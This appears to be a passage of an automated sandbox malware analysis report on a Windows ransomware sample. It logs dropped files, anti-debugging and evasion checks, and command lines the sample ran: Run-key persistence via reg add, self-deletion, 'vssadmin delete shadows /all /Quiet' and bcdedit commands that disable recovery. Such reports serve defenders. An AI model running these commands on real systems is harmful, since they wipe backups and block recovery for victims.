Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode execution: Found new code
PE file contains an invalid checksum
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: real checksum: 0xed005e8b should be: 0x5151d
Source: amhfnhe45.exe.2732.drStatic PE information: real checksum: 0xed005e8b should be: 0x5151d
PE file contains sections with non-standard names
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: section name: .data5
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: section name: .data4
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: section name: .data1
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: section name: .data3
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: section name: .data2
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: section name: .data6
Source: amhfnhe45.exe.2732.drStatic PE information: section name: .data5
Source: amhfnhe45.exe.2732.drStatic PE information: section name: .data4
Source: amhfnhe45.exe.2732.drStatic PE information: section name: .data1
Source: amhfnhe45.exe.2732.drStatic PE information: section name: .data3
Source: amhfnhe45.exe.2732.drStatic PE information: section name: .data2
Source: amhfnhe45.exe.2732.drStatic PE information: section name: .data6

Spreading:

barindex
Contains functionality to enumerate / list files inside a directory
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_2_00413AB0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_1_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_2_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_1_00413AB0
Contains functionality to query local drives
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413840 GetLogicalDriveStringsW,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,0_2_00413840
Enumerates the file system
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\11.0\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\

System Summary:

barindex
Classification label
Source: classification engineClassification label: mal76.evad.rans.phis.spyw.troj.winEXE@20/232@15/6
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_2_004201F0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_1_004201F0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,1_2_004201F0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,1_1_004201F0
Contains functionality to enum processes or threads
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_0041C8F0
Contains functionality to instantiate COM classes
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041F040 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,ExitProcess,CoCreateInstance,ExitProcess,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,GetVersionExW,CreateThread,SetThreadPriority,0_2_0041F040
Creates files inside the user directory
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeFile created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Creates temporary files
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile created: C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Low\help_recover_instructions+uuk.txt
Found command line output
Source: C:\Windows\System32\reg.exeConsole Write: ...........v..0.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N...........x...
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\vssadmin.exeConsole Write: .......................................v..0..................|..............................,...............S<..........
Source: C:\Windows\System32\vssadmin.exeConsole Write: ....................N.o. .i.t.e.m.s. .f.o.u.n.d. .t.h.a.t. .s.a.t.i.s.f.y. .t.h.e. .q.u.e.r.y.......4...P...S<..........
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........vd.......T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v..$.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.......$...$.N..........w.e.w
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........T...N..........w.e.w
PE file has an executable .text section and no other executable section
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknownProcess created: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: unknownProcess created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe
Source: unknownProcess created: C:\Windows\System32\reg.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeProcess created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL C:\94-61F~1.EXE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d C:\Users\admin\AppData\Roaming\amhfnhe45.exe /f
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\vssadmin.exe C:\Windows\System32\vssadmin.exe delete shadows /all /Quiet
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off
Uses an in-process (OLE) Automation server
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32
Creates mutexes
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeMutant created: \Sessions\1\BaseNamedObjects\12393578327533451
Reads the hosts file
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilename vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameTODO: <Original filename>J vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameQ-Dir.exe vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameMMDevAPI.Dll.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenamewdmaud.drv.muij% vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: System.OriginalFileName vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: originalfilename vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeBinary or memory string: OriginalFilenameQ-Dir.exe vs 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Sample reads its own file content
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeFile read: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Uses reg.exe to modify the Windows registry
Source: unknownProcess created: C:\Windows\System32\reg.exe
PE file contains more sections than normal
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exeStatic PE information: Number of sections : 11 > 10
Source: amhfnhe45.exe.2732.drStatic PE information: Number of sections : 11 > 10

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to create a new security descriptor
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041F040 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,ExitProcess,CoCreateInstance,ExitProcess,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,GetVersionExW,CreateThread,SetThreadPriority,0_2_0041F040
May try to detect the Windows Explorer process (often used for injection)
Source: amhfnhe45.exeBinary or memory string: Progman
Source: amhfnhe45.exeBinary or memory string: Program Manager
Source: amhfnhe45.exeBinary or memory string: Shell_TrayWnd
Contains functionality to launch a program with higher privileges
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0041E880 GetEnvironmentVariableW,ShellExecuteExW,ShellExecuteExW,GetLastError,Sleep,GetLastError,Sleep,ShellExecuteExW,CloseHandle,0_2_0041E880

Anti Debugging:

barindex
Contains functionality to register its own exception handler
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0042C13E SetUnhandledExceptionFilter,0_2_0042C13E
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004256FE
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00426F58
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_0042C13E SetUnhandledExceptionFilter,0_1_0042C13E
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_1_004256FE
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_1_00426F58
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0042C13E SetUnhandledExceptionFilter,1_2_0042C13E
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004256FE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00426F58
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_0042C13E SetUnhandledExceptionFilter,1_1_0042C13E
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_004256FE
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_00426F58 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_1_00426F58
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_004256FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004256FE
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_0041C8F0
Contains functionality to dynamically determine API calls
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_0042D4E5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D4E5
Contains functionality to read the PEB
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_001A0000 mov eax, dword ptr fs:[00000030h]0_2_001A0000
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_001A0000 mov ecx, dword ptr fs:[00000030h]0_2_001A0000
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_001A0408 mov eax, dword ptr fs:[00000030h]0_2_001A0408
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00170000 mov eax, dword ptr fs:[00000030h]1_2_00170000
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00170000 mov ecx, dword ptr fs:[00000030h]1_2_00170000
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00170408 mov eax, dword ptr fs:[00000030h]1_2_00170408
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413E50 GetProcessHeap,GetFileAttributesW,SetFileAttributesW,CreateFileW,GetFileSize,HeapAlloc,ReadFile,CloseHandle,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,HeapAlloc,HeapFree,HeapFree,HeapFree,CloseHandle,SetFilePointer,WriteFile,HeapFree,HeapFree,HeapFree,CloseHandle,WriteFile,WriteFile,FlushFileBuffers,CloseHandle,MoveFileExW,GetLastError,DeleteFileW,Sleep,HeapFree,HeapFree,HeapFree,0_2_00413E50
Enables debug privileges
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeProcess token adjusted: Debug
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directory
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_2_00413AB0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_1_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_2_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_1_00413AB0
Contains functionality to query local drives
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeCode function: 0_2_00413840 GetLogicalDriveStringsW,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,0_2_00413840
Queries a list of all running processes
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeProcess information queried: ProcessInformation
Checks the free space of harddrives
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeCode function: 1_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_0041C8F0
Enumerates the file system
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\11.0\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeFile opened: C:\Documents and Settings\admin\AppData\Local\Adobe\
Found dropped PE file which has not been started or loaded
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeDropped PE file which has not been started: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-16791
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-16978
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-16762
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe TID: 2764Thread sleep time: -60000ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3192Thread sleep count: 309 > 30
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3192Thread sleep time: -61800ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3196Thread sleep count: 178 > 30
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3196Thread sleep time: -71200ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3216Thread sleep time: -60000ms >= -60000ms
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe TID: 3216Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\vssadmin.exe TID: 3020Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\svchost.exe TID: 3084Thread sleep time: -60000ms >= -60000ms
Accesses Audio hardware information via COM
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\TreatAs
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Progid
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocServer32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_USERS\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\InprocHandler32
